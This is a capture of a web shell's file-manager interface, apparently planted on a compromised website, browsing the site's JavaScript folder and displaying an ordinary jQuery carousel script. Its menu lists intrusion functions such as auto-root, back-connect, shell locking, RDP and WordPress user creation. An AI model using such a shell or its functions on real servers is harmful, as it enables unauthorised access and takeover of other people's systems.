Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.60
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpromax.com /
source /
public /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.bundle.min.js
78.34
KB
-rw-r--r--
check_overflow.js
2.36
KB
-rw-r--r--
jquery.js
87.4
KB
-rw-r--r--
lightslider.js
46.96
KB
-rw-r--r--
owl.carousel.min.js
60.48
KB
-rw-r--r--
script.js
4.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
function openNav() { document.getElementById("res-nav").style.width = "100%"; } function closeNav() { document.getElementById("res-nav").style.width = "0%"; } $(window).on('load',function(){ $(".banner .owl-carousel").owlCarousel({ loop: true, nav: false, items: 1,dots:false}); $(".tab-pane .owl-carousel").owlCarousel({ loop: true, nav: false, items: 4,dots:false}); $(".offer-slider .owl-carousel").owlCarousel({ loop: true, nav: true, navText: ['<img alt="Oxo Packaging" srcset="assets/images/arrow-img-left.webp 800w, assets/images/arrow-img-left.webp 400w" sizes="(min-width: 400px) 400px, 400px" width="60px" height="60px"src="../assets/images/arrow-img-left.webp">', '<img srcset="../assets/images/arrow-img-right.webp 800w, ../assets/images/arrow-img-right.webp 400w" sizes="(min-width: 400px) 400px, 400px" width="60px" height="60px" src="../assets/images/arrow-img-right.webp" alt="OXO Packaging">'], autoplay: true, margin: 10, responsiveClass: true, responsive: { 0: { items: 1, nav: true }, 600: { items: 2 }, 1000: { items: 3, navigation: false }, 1280: { navigation: true } }, }); $(".testimonials .owl-carousel").owlCarousel({ dots:false, loop: true, nav: true, navText: ['<img alt="Oxo Packaging" srcset="assets/images/arrow-img-left.webp 800w, assets/images/arrow-img-left.webp 400w" sizes="(min-width: 400px) 400px, 400px" width="60px" height="60px"src="../assets/images/arrow-img-left.webp">', '<img srcset="../assets/images/arrow-img-right.webp 800w, ../assets/images/arrow-img-right.webp 400w" sizes="(min-width: 400px) 400px, 400px" width="60px" height="60px" src="../assets/images/arrow-img-right.webp" alt="OXO Packaging">'], margin: 10, responsiveClass: true, responsive: { 0: { items: 1, nav: true }, 600: { items: 1, nav: true }, 1000: { items: 2, nav: true } }, }); }); $(document).ready(function() { //jquery validation plugin if($('#get_quote').lenght>0){ $('#get_quote').validate({ highlight: function(element) { $(element).addClass('has-error'); }, unhighlight: function(element) { $(element).removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { return true; } });} });//end of document ready var ellipsestext = "..."; var moretext = "see more"; var lesstext = "see less"; $(".more_medium").each(function () { var showChar = 600; var content = $(this).html(); if (content.length > showChar) { var c = $(this).find('p:first').html(); var h2 = $(this).find('h2:first').html(); var h = $(this).html(); //console.log(clone); var html ='<h2 id="h2hid">'+h2+'</h2><p id="contentShow">' +c + '</p><span class="moreellipses">' + ellipsestext + '</span>' + '<span class="morecontent1">' + '<span style="display: none;">' + h + '</span>' + ' ' + '<a href="" class="morelink2">' + moretext + '</a>' + '</span>'; $(this).html(html); } }); $(".morelink2").click(function () { if ($(this).hasClass("less")) { $(this).removeClass("less"); $(this).html(moretext); $('#contentShow').show(); $('#h2hid').show(); } else { $('#contentShow').hide(); $('#h2hid').hide(); $(this).addClass("less"); $(this).html(lesstext); } $(this).parent().prev().toggle(); $(this).prev().toggle(); return false; }); $(document).ready(function(){ $(".content").each(function(){ if($(this).height() < $(this)[0].scrollHeight){ $(this).parent().find(".txtcol").show(); $(this).toggleClass("truncate"); } }); $(".txtcol").click(function(){ if($(this).prev().hasClass("truncate")) { $(this).parent().find(".content").css("max-height", $(this).parent().find(".content")[0].scrollHeight); $(this).children('a').text("Show Less"); } else { $(this).parent().find(".content").css("max-height", "3.6em"); $(this).children('a').text("Show More"); } $(this).prev().toggleClass("truncate"); }); });
Close